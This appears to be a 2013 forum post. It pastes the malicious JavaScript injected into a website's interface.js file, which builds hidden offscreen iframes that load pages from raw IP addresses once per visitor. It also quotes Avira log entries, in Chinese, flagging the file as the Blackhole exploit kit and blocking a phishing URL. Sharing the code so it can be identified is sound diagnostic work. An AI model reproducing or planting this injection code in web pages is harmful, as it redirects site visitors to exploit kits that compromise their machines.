- function eja09() {
- var static = 'ajax';
- var controller = 'index.php';
- var eja = document.createElement('iframe');
- eja.src = 'http://216.119.79.19/swf/cnt.php';
- eja.style.position = 'absolute';
- eja.style.color = '1';
- eja.style.height = '1px';
- eja.style.width = '1px';
- eja.style.left = '10001';
- eja.style.top = '10001';
- if (!document.getElementById('eja')) {
- document.write('<p id=\'eja\' class=\'eja09\' ></p>');
- document.getElementById('eja').appendChild(eja);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))) {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled) {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- eja09();
- }
- }
- function mqn09() {
- var static = 'ajax';
- var controller = 'index.php';
- var mqn = document.createElement('iframe');
- mqn.src = 'http://69.161.156.242/6QMKF2rD.php';
- mqn.style.position = 'absolute';
- mqn.style.color = '206';
- mqn.style.height = '206px';
- mqn.style.width = '206px';
- mqn.style.left = '1000206';
- mqn.style.top = '1000206';
- if (!document.getElementById('mqn')) {
- document.write('<p id=\'mqn\' class=\'mqn09\' ></p>');
- document.getElementById('mqn').appendChild(mqn);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))) {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled) {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- mqn09();
- }
- }
Avira
2013/9/30 下午 07:23 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\5TH1K21Z\interface[1].js'
包含病毒或有害的程式 'EXP/JS.Blacole.DD' [exploit]
已採取動作:
檔案會移動至 '5542fd1f.qua' 名稱底下的隔離區目錄。.
2013/9/30 下午 07:23 [System Scanner] 掃描
掃描結束 [已完成全部的掃描。]。
檔案數: 765
目錄數: 0
惡意程式碼數: 1
警告數: 0
2013/9/30 下午 07:22 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\5TH1K21Z\interface[1].js 中
偵測到病毒或有害的程式 'EXP/JS.Blacole.DD [exploit]'
執行的動作:傳輸至掃描程式
2013/9/30 下午 07:22 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\5TH1K21Z\interface[1].js 中
偵測到病毒或有害的程式 'EXP/JS.Blacole.DD [exploit]'
執行的動作:拒絕存取
2013/9/30 下午 07:21 [Web Protection] 已停用 Web Protection
服務已停用
2013/9/30 下午 07:21 [Web Protection] 封鎖的網頁
URL (http://www.city2000.ru/male-mas83/lang/mamaslogo/addext.html) 的評估結果為 網路釣魚
URL,而遭到封鎖。
|
发表于 2013-9-30 19:28:50